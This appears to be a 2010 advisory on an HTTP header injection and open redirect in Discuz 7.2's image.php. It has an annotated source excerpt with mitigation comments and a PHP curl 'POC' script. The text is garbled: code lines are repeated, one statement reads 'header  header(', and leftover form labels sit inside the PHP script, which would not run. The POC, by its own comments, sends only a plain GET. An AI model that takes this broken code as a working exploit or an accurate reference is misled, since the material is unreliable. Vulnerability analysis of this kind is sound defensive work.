dz7.2 HTTP 头注入漏洞 2010/7/7，dz7.2 HTTP header injection vulnerability, 2010/7/7.

image.php:

// Excerpt from image.php, quoted sink-first: the Location header comes first, and the
// lines below it are (reading downward) the values that feed it. Lines that appear
// more than once look like repeated quotes of the same statement, not separate code.
//
// SINK: $boardurl.$thumbfile is written into a response header unvalidated.
// htmlspecialchars() (applied below) only encodes <, >, &, " and '; it does not
// remove CR/LF, so it offers no protection against header injection here.
// Mitigation: build the redirect base from a configured site URL (or SCRIPT_NAME)
// rather than PHP_SELF/HTTP_HOST, and reject any CR/LF in values placed in headers.
// NOTE(review): newer PHP releases refuse header() values containing a newline, which
// narrows the injection to older builds; the open-redirect exposure via a
// client-controlled Host header remains regardless of PHP version.
header  header('location: '.$boardurl.$thumbfile);
// $boardurl is assembled from two request-controlled $_SERVER values: HTTP_HOST
// (the client's Host request header) and $PHP_SELF (see below). Only the directory
// part of $PHP_SELF is used (substr up to the last '/'), and the preg_replace merely
// trims a trailing api/archiver/wap segment -- neither step filters control characters.
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
// SOURCE: PHP_SELF reflects the request path as sent by the client, including any
// extra path appended after the script name; SCRIPT_NAME is used only when it is empty.
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
// $thumbfile is composed only of intval()'d request values ($aid, $w, $h below), so
// this part of the redirect target is numeric and is not the injection point.
$thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
$aid = intval($_GET['aid']);
$w = intval($w);
// 'size' is split on 'x' into width and height, then each part is cast to int.
list($w, $h) = explode('x', $_GET['size']);
$h = intval($h);
list($w, $h) = explode('x', $_GET['size']);

Preconditions (the redirect is reached only inside these branches):
if(!$nocache) {
if(file_exists($thumbfile)) {

POC:

#!/usr/bin/php -f 
<?php 

# image.php curl exploit 
# bincker/2010/7/7/ t00ls.net 
 
 
general settings: 
URL:   
COOKIEJAR:   
Max Exec Time:  (s)  
SSL:  BasicAuth:   
$_SERVER parameter:  
You can taint $_SERVER['PHP_SELF'] by editing the target URL.  
   
 
 
//  
// HTTP SERVER,   
//  
 
// The target host is the first CLI argument and is used verbatim, without any
// validation, both in the request URL and in the on-disk cookie-jar path below.
$target = $argv[1];

// As written this issues a plain GET of /image.php on the target; no crafted path or
// header is sent. Each option is applied with its own curl_setopt() call.
$session = curl_init();
$options = [
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_URL => "http://$target/image.php",
    CURLOPT_USERAGENT => "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)",
    CURLOPT_TIMEOUT => 3,
    CURLOPT_LOW_SPEED_LIMIT => 3,
    CURLOPT_LOW_SPEED_TIME => 3,
    // Any cookies set by the response are persisted here when the handle is closed.
    CURLOPT_COOKIEJAR => "/tmp/cookie_$target",
];
foreach ($options as $option => $value) {
    curl_setopt($session, $option, $value);
}
$response = curl_exec($session);
curl_close($session);
unset($session);

// curl_exec() returns false on a transport failure, in which case echo prints nothing.
echo $response;
 
?>